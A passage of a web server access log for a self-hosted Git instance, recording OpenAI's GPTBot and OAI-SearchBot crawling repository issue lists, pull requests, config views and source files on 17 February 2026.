"https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/data_fetcher/__pycache__/__init__.cpython-312.pyc" +[17/Feb/2026:19:16:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&milestone=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10042] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?milestone=-1&sort=recentupdate&state=open&type=all" +[17/Feb/2026:19:16:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&milestone=-1&project=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10208] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&labels=0&milestone=-1&project=-1&sort=leastupdate&state=all&type=all" +[17/Feb/2026:19:16:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/npm/data/nginx/proxy_host/1.conf?display=rendered" [Client 74.7.227.38] [Length 11233] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/nginx/proxy_host/1.conf" +[17/Feb/2026:19:16:11 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/robots.txt" [Client 74.7.175.175] [Length 19] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36; compatible; OAI-SearchBot/1.3; robots.txt; +https://openai.com/searchbot" "-" +[17/Feb/2026:19:16:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/npm/data/nginx/proxy_host/2.conf?display=rendered" [Client 74.7.227.38] [Length 11234] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/nginx/proxy_host/2.conf" +[17/Feb/2026:19:16:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/npm/data/nginx/proxy_host/3.conf?display=rendered" [Client 74.7.227.38] [Length 11208] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/nginx/proxy_host/3.conf" +[17/Feb/2026:19:16:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/npm/data/nginx/proxy_host/4.conf?display=rendered" [Client 74.7.227.38] [Length 11234] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/nginx/proxy_host/4.conf" +[17/Feb/2026:19:16:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&milestone=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10217] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&milestone=-1&sort=leastcomment&state=open&type=all" +[17/Feb/2026:19:16:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&milestone=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10223] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&milestone=-1&sort=leastcomment&state=closed&type=all" +[17/Feb/2026:19:16:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&milestone=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10227] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?milestone=-1&sort=leastupdate&state=closed&type=all" +[17/Feb/2026:19:16:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/src-old/old_log_macros.hpp?display=rendered" [Client 74.7.227.38] [Length 11066] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/src-old/old_log_macros.hpp" +[17/Feb/2026:19:16:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/src-old/old_log_macros.hpp?display=rendered" [Client 74.7.227.38] [Length 11065] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/src-old/old_log_macros.hpp" +[17/Feb/2026:19:16:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&milestone=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10212] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?milestone=-1&sort=recentupdate&state=open&type=all" +[17/Feb/2026:19:16:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&milestone=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10222] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&milestone=-1&sort=mostcomment&state=closed&type=all" +[17/Feb/2026:19:16:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&milestone=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10218] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&milestone=-1&sort=mostcomment&state=closed&type=all" +[17/Feb/2026:19:16:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&milestone=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10225] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&milestone=-1&sort=mostcomment&state=closed&type=all" +[17/Feb/2026:19:16:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&milestone=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10055] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?milestone=-1&sort=leastupdate&state=closed&type=all" +[17/Feb/2026:19:16:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&labels=0&project=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10213] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&labels=0&project=-1&state=open&type=all" +[17/Feb/2026:19:16:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&labels=0&project=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10041] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&labels=0&project=-1&sort=leastcomment&state=open&type=all" +[17/Feb/2026:19:16:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&labels=0&project=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10041] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&labels=0&project=-1&state=open&type=all" +[17/Feb/2026:19:16:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&milestone=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10035] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&sort=recentupdate&state=closed&type=all" +[17/Feb/2026:19:16:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&milestone=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10039] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&milestone=-1&state=closed&type=all" +[17/Feb/2026:19:16:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&project=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10221] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&project=-1&sort=oldest&state=closed&type=all" +[17/Feb/2026:19:16:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&milestone=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10209] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&milestone=-1&sort=leastcomment&state=closed&type=all" +[17/Feb/2026:19:16:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&milestone=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10042] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&milestone=-1&state=closed&type=all" +[17/Feb/2026:19:16:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?milestone=-1&project=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10205] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?milestone=-1&sort=leastcomment&state=open&type=all" +[17/Feb/2026:19:16:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&milestone=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10194] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&milestone=-1&sort=mostcomment&state=open&type=all" +[17/Feb/2026:19:16:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&milestone=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10024] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&milestone=-1&state=open&type=all" +[17/Feb/2026:19:16:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?labels=0&milestone=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10215] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?labels=0&milestone=-1&sort=mostcomment&state=closed&type=all" +[17/Feb/2026:19:16:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&project=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10225] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&project=-1&sort=oldest&state=closed&type=all" +[17/Feb/2026:19:16:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?labels=0&milestone=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10039] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?labels=0&milestone=-1&sort=leastcomment&state=closed&type=all" +[17/Feb/2026:19:16:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&project=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10054] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&project=-1&sort=oldest&state=closed&type=all" +[17/Feb/2026:19:16:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&project=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10166] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?project=-1&sort=oldest&state=all&type=all" +[17/Feb/2026:19:16:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&project=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10162] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?project=-1&sort=oldest&state=all&type=all" +[17/Feb/2026:19:16:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" [Client 74.7.227.38] [Length 13471] [Gzip 4.79] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir" +[17/Feb/2026:19:16:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&project=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10221] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28none%29&project=-1&sort=leastcomment&state=open&type=all" +[17/Feb/2026:19:16:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&milestone=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10046] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28any%29&milestone=-1&sort=leastcomment&state=open&type=all" +[17/Feb/2026:19:16:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&project=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10226] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&project=-1&sort=leastcomment&state=all&type=all" +[17/Feb/2026:19:16:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&milestone=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10040] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&milestone=-1&sort=leastcomment&state=all&type=all" +[17/Feb/2026:19:16:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&milestone=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10041] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&milestone=-1&sort=mostcomment&state=all&type=all" +[17/Feb/2026:19:16:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?labels=0&project=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10174] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?labels=0&project=-1&state=all&type=all" +[17/Feb/2026:19:16:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commit/3181052619700dceeeef81a9a0851130498f177e?files=.Notebook%2fBRIN%20%ec%84%a4%eb%aa%85.md" [Client 74.7.227.38] [Length 26246] [Gzip 5.80] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/commits/commit/3181052619700dceeeef81a9a0851130498f177e/.Notebook/BRIN%20%EC%84%A4%EB%AA%85.md" +[17/Feb/2026:19:16:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/src-old/old_log_macros.hpp?display=source" [Client 74.7.227.38] [Length 11869] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/src-old/old_log_macros.hpp" +[17/Feb/2026:19:16:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/src-old/old_log_macros.hpp?display=source" [Client 74.7.227.38] [Length 11871] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/src-old/old_log_macros.hpp" +[17/Feb/2026:19:16:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/src-old/old_log_macros.hpp?display=source" [Client 74.7.227.38] [Length 11870] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/src-old/old_log_macros.hpp" +[17/Feb/2026:19:16:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d?display=source" [Client 74.7.227.38] [Length 13486] [Gzip 4.78] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" +[17/Feb/2026:19:16:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" [Client 74.7.227.38] [Length 9853] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" +[17/Feb/2026:19:16:34 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" +[17/Feb/2026:19:16:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" +[17/Feb/2026:19:16:35 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" +[17/Feb/2026:19:16:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" +[17/Feb/2026:19:16:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d?display=rendered" [Client 74.7.227.38] [Length 11300] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" +[17/Feb/2026:19:16:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" [Client 74.7.227.38] [Length 941] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" +[17/Feb/2026:19:16:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" [Client 74.7.227.38] [Length 2951] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" +[17/Feb/2026:19:16:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/src-old/old_log_macros.hpp?display=source" [Client 74.7.227.38] [Length 11829] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/src-old/old_log_macros.hpp" +[17/Feb/2026:19:16:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/TestApp?display=rendered" [Client 74.7.227.38] [Length 11156] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/TestApp" +[17/Feb/2026:19:16:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldPilot/%EC%8A%A4%EB%A0%88%EB%93%9C_%EB%B6%84%EB%A6%AC_%EC%9E%91%EC%97%85_%EC%99%84%EB%A3%8C.md?display=source" [Client 74.7.227.38] [Length 22041] [Gzip 5.85] 